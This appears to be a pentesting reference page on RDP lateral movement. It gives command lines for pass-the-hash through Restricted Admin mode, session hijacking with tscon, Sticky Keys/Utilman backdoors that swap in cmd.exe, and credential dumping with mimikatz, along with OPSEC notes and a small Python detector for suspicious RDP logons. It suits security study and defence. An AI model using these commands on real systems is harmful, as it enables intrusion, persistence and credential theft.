# RDP Lateral Movement
## Overview
Remote Desktop Protocol (RDP), TCP port 3389, provides graphical remote access and is a common lateral movement path. Beyond a standard credential-based login, the techniques below cover Restricted Admin mode for Pass-the-Hash, hijacking an existing session with tscon, and accessibility-feature backdoors planted at the login screen. RDP matters when a command-line shell is not enough, for example for GUI-dependent applications or UAC bypass techniques that need an interactive desktop.
## Prerequisites
- Valid credentials or NTLM hash (for Restricted Admin mode)
- Port 3389 accessible
- xfreerdp (Linux) or mstsc.exe (Windows)
- SYSTEM privileges for session hijacking and backdoor techniques
## Exploitation / Execution
### 1. Standard RDP Connection
```bash
xfreerdp /v:<IP> /u:<user> /p:'<password>'
xfreerdp /v:<IP> /u:<user> /p:'<password>' /dynamic-resolution
xfreerdp /v:<IP> /u:<user> /p:'<password>' /drive:share,/tmp   # Mount local dir as a share
```
### 2. Restricted Admin Mode (PTH over RDP)
Restricted Admin mode allows authentication with an NTLM hash instead of a plaintext password. It must be enabled on the target (requires elevated access there):
```cmd
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
```
Then connect with the hash from the attacking host:
```bash
xfreerdp /v:<IP> /u:<user> /pth:<NTLM_hash>
xfreerdp /v:<IP> /u:administrator /pth:d9485863c1e9e05851aa40cbb4ab9dff
```
### 3. TSCon Session Hijacking
Hijack an existing active RDP session. Requires SYSTEM privileges:
```cmd
query session                      # List active sessions (ID, User, State)
tscon <SESSION_ID> /dest:console   # Connect their session to yours
```
If you have RDP access as a different user, you can hijack the Administrator's session:
```cmd
query session
# Output:
#  SESSIONNAME   USERNAME        ID  STATE
# >console       Administrator    1  Active
#                victim           3  Disc
tscon 3 /dest:console              # Hijack victim's disconnected session
```
### 4. Sticky Keys / Utilman Backdoor
Requires SYSTEM access. Replace accessibility binaries with cmd.exe to spawn a SYSTEM shell at the login screen:
```cmd
# Sticky Keys (trigger: press Shift 5 times at the RDP login screen)
takeown /f C:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Everyone:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe /y

# Utilman (trigger: click the Ease of Access button at the login screen)
takeown /f C:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Everyone:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe /y
```
After replacement, connect via RDP, trigger the backdoor at the login screen, and a SYSTEM cmd.exe appears.
### 5. RDP Credential Theft (from SYSTEM context)
```cmd
cmdkey /list                      # List saved credentials
mimikatz # sekurlsa::dpapi        # Extract DPAPI keys ("mimikatz #" is the mimikatz prompt)
mimikatz # vault::cred /patch     # Dump vault credentials
```
## Common Pitfalls
- ⚠️ Restricted Admin mode must be enabled on target; disabled by default on some builds
- ⚠️ NLA (Network Level Authentication) must be off for some backdoor techniques
- ⚠️ Session hijacking requires SYSTEM or the target session's user token
- ⚠️ Accessibility backdoors leave modified binaries that integrity checks can detect
## OPSEC Considerations
- 🛡️ RDP logons generate Event ID 4624 with Logon Type 10 (RemoteInteractive)
- 🛡️ Sticky keys/Utilman replacement creates file hash mismatch (detectable by file integrity monitoring)
- 🛡️ Session hijacking (tscon) generates minimal logs but may disconnect the legitimate user (alerting them)
- 🛡️ Multiple RDP connections from unexpected IPs may alert SOC
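As an added example that is not part of the original notes, a small detector for the first and last OPSEC signals above: it scans constructed, JSON-shaped event records (field names follow the Security log's 4624 data, but the records are made up) and flags RemoteInteractive logons from outside a hypothetical jump-host subnet or for a hypothetical list of accounts that should never log on over RDP.

```python
import json
from ipaddress import ip_address, ip_network

# Constructed records shaped like Security event 4624 data fields; not real logs.
SAMPLE_EVENTS = [
    '{"EventID": 4624, "LogonType": 10, "TargetUserName": "jdoe", "IpAddress": "10.10.10.5", "TimeCreated": "2024-01-05T09:12:01Z"}',
    '{"EventID": 4624, "LogonType": 10, "TargetUserName": "svc_backup", "IpAddress": "192.168.77.4", "TimeCreated": "2024-01-05T09:13:10Z"}',
    '{"EventID": 4624, "LogonType": 3, "TargetUserName": "svc_backup", "IpAddress": "192.168.77.4", "TimeCreated": "2024-01-05T09:13:12Z"}',
    '{"EventID": 4624, "LogonType": 10, "TargetUserName": "Administrator", "IpAddress": "10.10.10.5", "TimeCreated": "2024-01-05T09:20:44Z"}',
    'not an event record',
]

# Hypothetical policy: interactive RDP is expected only from the jump-host subnet,
# and never for the built-in Administrator account.
ALLOWED_RDP_SOURCES = [ip_network("10.10.10.0/24")]
RDP_DENIED_ACCOUNTS = {"administrator"}


def source_allowed(ip_text, allowed):
    """True when the source address parses and lies inside an allowed network ('-' never does)."""
    try:
        ip = ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in allowed)


def classify_rdp_logon(event, allowed, denied):
    """Reason string for a suspicious RemoteInteractive (Logon Type 10) 4624 event, else None."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 10:
        return None
    if str(event.get("TargetUserName", "")).lower() in denied:
        return "rdp-logon-denied-account"
    if not source_allowed(str(event.get("IpAddress", "")), allowed):
        return "rdp-logon-unexpected-source"
    return None


def find_suspicious_rdp_logons(lines, allowed=ALLOWED_RDP_SOURCES, denied=RDP_DENIED_ACCOUNTS):
    """Return (time, user, source ip, reason) per flagged event; non-JSON lines are skipped."""
    hits = []
    for line in lines:
        try:
            event = json.loads(line)
        except ValueError:
            continue
        reason = classify_rdp_logon(event, allowed, denied) if isinstance(event, dict) else None
        if reason:
            hits.append((event.get("TimeCreated"), event.get("TargetUserName"), event.get("IpAddress"), reason))
    return hits
```

Network (type 3) logons from the same unexpected host are deliberately ignored here so the rule stays focused on interactive RDP; a separate rule would cover them.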
## Post-Exploitation Value
- Full GUI access enables credential harvesting through saved RDP connections
- Drive redirection facilitates data exfiltration without additional tools
- UAC bypass exploits requiring GUI interaction become feasible
- Session hijacking provides access to in-progress user work and unlocked applications
## Cross-References
### Tool References
| Tool | Link |
|---|---|
| xfreerdp | https://github.com/FreeRDP/FreeRDP |
| mimikatz | https://github.com/gentilkiwi/mimikatz |
### Source Machines
- Jeeves (Medium, Windows) - RDP access after Jenkins foothold